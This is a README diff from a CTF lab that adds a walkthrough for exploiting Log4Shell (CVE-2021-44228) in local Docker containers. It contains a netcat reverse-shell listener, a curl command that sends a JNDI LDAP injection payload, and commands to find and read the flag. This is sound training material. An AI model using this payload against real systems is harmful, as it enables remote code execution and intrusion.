sgwgsw/Rowdyhacks2022-CTF/README.md

 2. Click the stop button in 'Containers / Apps' on Docker Desktop
 3. Run 'docker system prune -a' on the host machine, and press 'y' when prompted
 4. Delete the cloned Log4j_LAB-Docker repo/folder on your machine

+**Solution**
+There are several approaches to solving this CTF.
+Here is one successful approach to our CVE-2021-44228 challenge.

+1. Open a CLI session on the curl_instance container.
+Do this through Docker Desktop by selecting the ‘CLI’ button next to the curl_instance container.

+2. Open a CLI session on the c2_instance container.

+3. Run ‘ping -c 1 web_server’ in curl_instance or c2_instance to get the IP address of the vulnerable web server.

+4. In c2_instance, ru ‘nc -nlvp 9999’.
+The instructions stated that the compiled java code would want to talk on port 9999.
+We need to open a listener on that port to receive the java code, which is a reverse shell.

+5. In curl_instance, we will send the exploit payload.
+Run ‘curl -A “\{jndi:ldap://ldap_server:1389/Exploit” http://<web_server_IP>:8080’, where <web_server_IP> is the IP address recovered from step 3 above.
+[1] When this payload is received by web_server, instead of Log4J logging the header it will make a connection to ldap_server on port 8080, asking for the Exploit reference object.
+[2] ldap_sever then queries the reference object which links out to http_server hosting the java code.
+[3] The reverse shell is sent to web_server and opened on c2_instance.

+6. Run ‘find / -name flag.txt’ in c2_instance, which is now a reverse shell executing these commands on web_server.

+7. Run ‘cat /usr/local/tomcat/flag.txt’ to print the flag.
+This location will be output from step 6 above.